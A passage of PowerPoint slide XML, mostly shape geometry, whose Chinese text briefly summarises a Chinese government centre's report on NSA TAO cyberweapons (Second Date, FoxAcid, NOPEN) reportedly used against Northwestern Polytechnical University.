              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>控制了西北工业大学的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>边界服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“酸狐狸”武器平台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>：对IE、FireFox等多平台上的主流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>开展远程溢出攻击，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>获取目标系统的控制权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>。TAO主要使用该武器平台对西北工业大学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>办公内网主机进行入侵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587928" y="2349234"/>
            <a:ext cx="1382594" cy="1348670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 515251 w 1306423"/>
              <a:gd name="connsiteY0" fmla="*/ 286600 h 1274368"/>
              <a:gd name="connsiteX1" fmla="*/ 249440 w 1306423"/>
              <a:gd name="connsiteY1" fmla="*/ 250736 h 1274368"/>
              <a:gd name="connsiteX2" fmla="*/ 285331 w 1306423"/>
              <a:gd name="connsiteY2" fmla="*/ 516394 h 1274368"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1306423"/>
              <a:gd name="connsiteY3" fmla="*/ 1274343 h 1274368"/>
              <a:gd name="connsiteX4" fmla="*/ 459600 w 1306423"/>
              <a:gd name="connsiteY4" fmla="*/ 1274368 h 1274368"/>
              <a:gd name="connsiteX5" fmla="*/ 717448 w 1306423"/>
              <a:gd name="connsiteY5" fmla="*/ 718731 h 1274368"/>
              <a:gd name="connsiteX6" fmla="*/ 1306423 w 1306423"/>
              <a:gd name="connsiteY6" fmla="*/ 458597 h 1274368"/>
              <a:gd name="connsiteX7" fmla="*/ 1306423 w 1306423"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 1274368"/>
              <a:gd name="connsiteX8" fmla="*/ 515251 w 1306423"/>
              <a:gd name="connsiteY8" fmla="*/ 286600 h 12743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06423" h="1274368">
                <a:moveTo>
                  <a:pt x="515251" y="286600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="249440" y="250736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285331" y="516394"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="110058" y="739609"/>
                  <a:pt x="14808" y="1005103"/>
                  <a:pt x="0" y="1274343"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="459600" y="1274368"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="476567" y="1071752"/>
                  <a:pt x="562381" y="873747"/>
                  <a:pt x="717448" y="718731"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="880960" y="555155"/>
                  <a:pt x="1092275" y="468464"/>
                  <a:pt x="1306423" y="458597"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1306423" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1025842" y="8559"/>
                  <a:pt x="747623" y="104203"/>
                  <a:pt x="515251" y="286600"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="22364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22" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6045038" y="3772456"/>
            <a:ext cx="1397970" cy="1432578"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1018438 w 1320952"/>
              <a:gd name="connsiteY0" fmla="*/ 856195 h 1353654"/>
              <a:gd name="connsiteX1" fmla="*/ 1320952 w 1320952"/>
              <a:gd name="connsiteY1" fmla="*/ 37 h 1353654"/>
              <a:gd name="connsiteX2" fmla="*/ 862457 w 1320952"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1353654"/>
              <a:gd name="connsiteX3" fmla="*/ 601370 w 1320952"/>
              <a:gd name="connsiteY3" fmla="*/ 634682 h 1353654"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1320952"/>
              <a:gd name="connsiteY4" fmla="*/ 895083 h 1353654"/>
              <a:gd name="connsiteX5" fmla="*/ 63 w 1320952"/>
              <a:gd name="connsiteY5" fmla="*/ 1353654 h 1353654"/>
              <a:gd name="connsiteX6" fmla="*/ 822756 w 1320952"/>
              <a:gd name="connsiteY6" fmla="*/ 1051712 h 1353654"/>
              <a:gd name="connsiteX7" fmla="*/ 1049006 w 1320952"/>
              <a:gd name="connsiteY7" fmla="*/ 1082319 h 1353654"/>
              <a:gd name="connsiteX8" fmla="*/ 1018438 w 1320952"/>
              <a:gd name="connsiteY8" fmla="*/ 856195 h 13536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20952" h="1353654">
                <a:moveTo>
                  <a:pt x="1018438" y="856195"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1221104" y="607593"/>
                  <a:pt x="1321942" y="303657"/>
                  <a:pt x="1320952" y="37"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="862457" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="863485" y="229577"/>
                  <a:pt x="776554" y="459537"/>
                  <a:pt x="601370" y="634682"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="434695" y="801395"/>
                  <a:pt x="218427" y="888047"/>
                  <a:pt x="0" y="895083"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63" y="1353654"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="292506" y="1347432"/>
                  <a:pt x="583272" y="1246860"/>
                  <a:pt x="822756" y="1051712"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1049006" y="1082319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1018438" y="856195"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="22364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19" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4585605" y="3782537"/>
            <a:ext cx="1384919" cy="1432256"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 458571 w 1308620"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1353349"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 1308620"/>
              <a:gd name="connsiteY1" fmla="*/ 12 h 1353349"/>
              <a:gd name="connsiteX2" fmla="*/ 292036 w 1308620"/>
              <a:gd name="connsiteY2" fmla="*/ 842683 h 1353349"/>
              <a:gd name="connsiteX3" fmla="*/ 261429 w 1308620"/>
              <a:gd name="connsiteY3" fmla="*/ 1069606 h 1353349"/>
              <a:gd name="connsiteX4" fmla="*/ 483704 w 1308620"/>
              <a:gd name="connsiteY4" fmla="*/ 1039545 h 1353349"/>
              <a:gd name="connsiteX5" fmla="*/ 1308620 w 1308620"/>
              <a:gd name="connsiteY5" fmla="*/ 1353350 h 1353349"/>
              <a:gd name="connsiteX6" fmla="*/ 1308595 w 1308620"/>
              <a:gd name="connsiteY6" fmla="*/ 894803 h 1353349"/>
              <a:gd name="connsiteX7" fmla="*/ 719620 w 1308620"/>
              <a:gd name="connsiteY7" fmla="*/ 634669 h 1353349"/>
              <a:gd name="connsiteX8" fmla="*/ 458571 w 1308620"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 13533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08620" h="1353349">
                <a:moveTo>
                  <a:pt x="458571" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="12"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-952" y="298221"/>
                  <a:pt x="96545" y="596569"/>
                  <a:pt x="292036" y="842683"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="261429" y="1069606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483704" y="1039545"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="722591" y="1239812"/>
                  <a:pt x="1014310" y="1344371"/>
                  <a:pt x="1308620" y="1353350"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1308595" y="894803"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1094435" y="884897"/>
                  <a:pt x="883119" y="798182"/>
                  <a:pt x="719620" y="634669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="544423" y="459498"/>
                  <a:pt x="457466" y="229565"/>
                  <a:pt x="458571" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="DAB96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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6056442" y="2352940"/>
            <a:ext cx="1395685" cy="1348966"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1057123 w 1318793"/>
              <a:gd name="connsiteY0" fmla="*/ 240017 h 1274648"/>
              <a:gd name="connsiteX1" fmla="*/ 789698 w 1318793"/>
              <a:gd name="connsiteY1" fmla="*/ 276110 h 1274648"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1318793"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1274648"/>
              <a:gd name="connsiteX3" fmla="*/ 25 w 1318793"/>
              <a:gd name="connsiteY3" fmla="*/ 458533 h 1274648"/>
              <a:gd name="connsiteX4" fmla="*/ 601395 w 1318793"/>
              <a:gd name="connsiteY4" fmla="*/ 719035 h 1274648"/>
              <a:gd name="connsiteX5" fmla="*/ 859256 w 1318793"/>
              <a:gd name="connsiteY5" fmla="*/ 1274648 h 1274648"/>
              <a:gd name="connsiteX6" fmla="*/ 1318793 w 1318793"/>
              <a:gd name="connsiteY6" fmla="*/ 1274622 h 1274648"/>
              <a:gd name="connsiteX7" fmla="*/ 1021715 w 1318793"/>
              <a:gd name="connsiteY7" fmla="*/ 501916 h 1274648"/>
              <a:gd name="connsiteX8" fmla="*/ 1057123 w 1318793"/>
              <a:gd name="connsiteY8" fmla="*/ 240017 h 12746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8793" h="1274648">
                <a:moveTo>
                  <a:pt x="1057123" y="240017"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="789698" y="276110"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="556729" y="98069"/>
                  <a:pt x="279234" y="6007"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="25" y="458533"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="218427" y="465620"/>
                  <a:pt x="434708" y="552310"/>
                  <a:pt x="601395" y="719035"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="756450" y="874052"/>
                  <a:pt x="842276" y="1072019"/>
                  <a:pt x="859256" y="1274648"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1318793" y="1274622"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1303655" y="999464"/>
                  <a:pt x="1204531" y="728040"/>
                  <a:pt x="1021715" y="501916"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1057123" y="240017"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="DAB96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16" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4585605" y="3772456"/>
            <a:ext cx="1384919" cy="1432256"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 458571 w 1308620"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1353349"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 1308620"/>
              <a:gd name="connsiteY1" fmla="*/ 12 h 1353349"/>
              <a:gd name="connsiteX2" fmla="*/ 292036 w 1308620"/>
              <a:gd name="connsiteY2" fmla="*/ 842683 h 1353349"/>
              <a:gd name="connsiteX3" fmla="*/ 261429 w 1308620"/>
              <a:gd name="connsiteY3" fmla="*/ 1069606 h 1353349"/>
              <a:gd name="connsiteX4" fmla="*/ 483704 w 1308620"/>
              <a:gd name="connsiteY4" fmla="*/ 1039545 h 1353349"/>
              <a:gd name="connsiteX5" fmla="*/ 1308620 w 1308620"/>
              <a:gd name="connsiteY5" fmla="*/ 1353350 h 1353349"/>
              <a:gd name="connsiteX6" fmla="*/ 1308595 w 1308620"/>
              <a:gd name="connsiteY6" fmla="*/ 894803 h 1353349"/>
              <a:gd name="connsiteX7" fmla="*/ 719620 w 1308620"/>
              <a:gd name="connsiteY7" fmla="*/ 634669 h 1353349"/>
              <a:gd name="connsiteX8" fmla="*/ 458571 w 1308620"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 13533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08620" h="1353349">
                <a:moveTo>
                  <a:pt x="458571" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="12"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-952" y="298221"/>
                  <a:pt x="96545" y="596569"/>
                  <a:pt x="292036" y="842683"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="261429" y="1069606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483704" y="1039545"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="722591" y="1239812"/>
                  <a:pt x="1014310" y="1344371"/>
                  <a:pt x="1308620" y="1353350"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1308595" y="894803"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1094435" y="884897"/>
                  <a:pt x="883119" y="798182"/>
                  <a:pt x="719620" y="634669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="544423" y="459498"/>
                  <a:pt x="457466" y="229565"/>
                  <a:pt x="458571" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFBA1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18" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6045018" y="2348908"/>
            <a:ext cx="1395685" cy="1348966"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1057123 w 1318793"/>
              <a:gd name="connsiteY0" fmla="*/ 240017 h 1274648"/>
              <a:gd name="connsiteX1" fmla="*/ 789698 w 1318793"/>
              <a:gd name="connsiteY1" fmla="*/ 276110 h 1274648"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1318793"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1274648"/>
              <a:gd name="connsiteX3" fmla="*/ 25 w 1318793"/>
              <a:gd name="connsiteY3" fmla="*/ 458533 h 1274648"/>
              <a:gd name="connsiteX4" fmla="*/ 601395 w 1318793"/>
              <a:gd name="connsiteY4" fmla="*/ 719035 h 1274648"/>
              <a:gd name="connsiteX5" fmla="*/ 859256 w 1318793"/>
              <a:gd name="connsiteY5" fmla="*/ 1274648 h 1274648"/>
              <a:gd name="connsiteX6" fmla="*/ 1318793 w 1318793"/>
              <a:gd name="connsiteY6" fmla="*/ 1274622 h 1274648"/>
              <a:gd name="connsiteX7" fmla="*/ 1021715 w 1318793"/>
              <a:gd name="connsiteY7" fmla="*/ 501916 h 1274648"/>
              <a:gd name="connsiteX8" fmla="*/ 1057123 w 1318793"/>
              <a:gd name="connsiteY8" fmla="*/ 240017 h 12746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8793" h="1274648">
                <a:moveTo>
                  <a:pt x="1057123" y="240017"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="789698" y="276110"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="556729" y="98069"/>
                  <a:pt x="279234" y="6007"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="25" y="458533"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="218427" y="465620"/>
                  <a:pt x="434708" y="552310"/>
                  <a:pt x="601395" y="719035"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="756450" y="874052"/>
                  <a:pt x="842276" y="1072019"/>
                  <a:pt x="859256" y="1274648"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1318793" y="1274622"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1303655" y="999464"/>
                  <a:pt x="1204531" y="728040"/>
                  <a:pt x="1021715" y="501916"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1057123" y="240017"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFBA1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23" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6667220" y="2782178"/>
            <a:ext cx="360680" cy="262890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1695"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5108125" y="2782178"/>
            <a:ext cx="360680" cy="262890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1695"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5089650" y="3548285"/>
            <a:ext cx="1890395" cy="466090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1585"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="80010" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>INDUSTRY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1695"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="80010" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PAIN POINTS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7853045" y="1217295"/>
            <a:ext cx="4001770" cy="4355465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>①“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>二次约会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>”：TAO在西北工业大学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>边界设备</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>上安置该武器，劫持流经该设备的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>流量引导</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>至“酸狐狸”平台实施漏洞攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>②“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOPEN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>”：支持多种操作系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>远控木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>，具备权限提升和持久化能力。TAO主要使用该武器对西北工业大学网络内部的核心业务服务器和关键网络设备实施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>持久化控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>③“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>怒火喷射</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>”：根据目标系统环境定制化生成不同类型的木马服务端，服务端本身具备极强的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>抗分析、反调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>能力。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6264275" y="1707515"/>
            <a:ext cx="1434465" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>持久化控制类武器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524510" y="5701665"/>
            <a:ext cx="9752965" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>国家计算机病毒应急处理中心：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>《美国国家安全局（NSA）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
